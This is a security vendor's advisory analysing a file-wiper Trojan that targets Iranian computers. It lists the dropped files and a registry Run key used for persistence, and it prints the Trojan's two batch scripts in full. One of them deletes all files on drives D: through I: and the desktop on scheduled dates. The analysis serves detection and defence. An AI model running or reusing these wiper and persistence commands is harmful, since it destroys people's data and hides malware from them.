New File Wiper Trojan targeting Iran
The Dell Sonicwall Threats research team received reports of a new file wiper Trojan. The purpose of this Trojan is quite simple: Delete files on a range of specified drives on specified dates. This can be on remote storage devices or local external storage as long as they are mounted under certain drive letters. It has been widely reported that the attack is targeted and the Trojan is aimed at affecting Iranian computers.
Infection cycle:
The Trojan adds the following files to the filesystem. These files are contained in the rar compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:
- %SYSTEM32%jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
- %SYSTEM32%juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
- %SYSTEM32%SLEEP.EXE [non-malicious sleep utility]
- %USERPROFILE%Local SettingsTempE.tmpjuboot.bat [dropped by juboot.exe]
- %USERPROFILE%Local SettingsTemp11.tmpjucheck.bat [dropped by jucheck.exe]
The Trojan adds the following key to the windows registry to enable startup after reboot:
- HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun jucheck.exe "%SYSTEM32%jucheck.exe"
The file juboot.bat contains the following data that is used to initiate infection:
@echo off & setlocal
sleep for 2
REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d "%systemroot%system32jucheck.exe" /f
start "" /D"%systemroot%system32" "jucheck.exe"
The file jucheck.bat contains the following data which causes all files on the desktop and in drives D: through I: to be wiped on the specified dates:
@echo off & setlocal
sleep for 2
del "%systemroot%system32juboot.exe" /q /s /f
del "%userprofile%Start MenuProgramsStartupGrooveMonitor.exe" /q /s /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes
if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes
if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes
if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes
if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes
if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes
if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes
if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no
:yes
sleep for 3000
IF EXIST d: del "d:*.*" /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del "e:*.*" /q /s /f
IF EXIST e: Chkdsk e:
IF EXIST f: del "f:*.*" /q /s /f
IF EXIST f: Chkdsk f:
IF EXIST g: del "g:*.*" /q /s /f
IF EXIST g: Chkdsk g:
IF EXIST h: del "h:*.*" /q /s /f
IF EXIST h: Chkdsk h:
IF EXIST i: del "i:*.*" /q /s /f
IF EXIST i: Chkdsk i:
del "%userprofile%Desktop*.*" /q /s /f
\start calc
:no
The .bat files are deleted after execution.
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
- GAV: DelFiles.NBV (Trojan)
- GAV: Batchwiper.A (Trojan)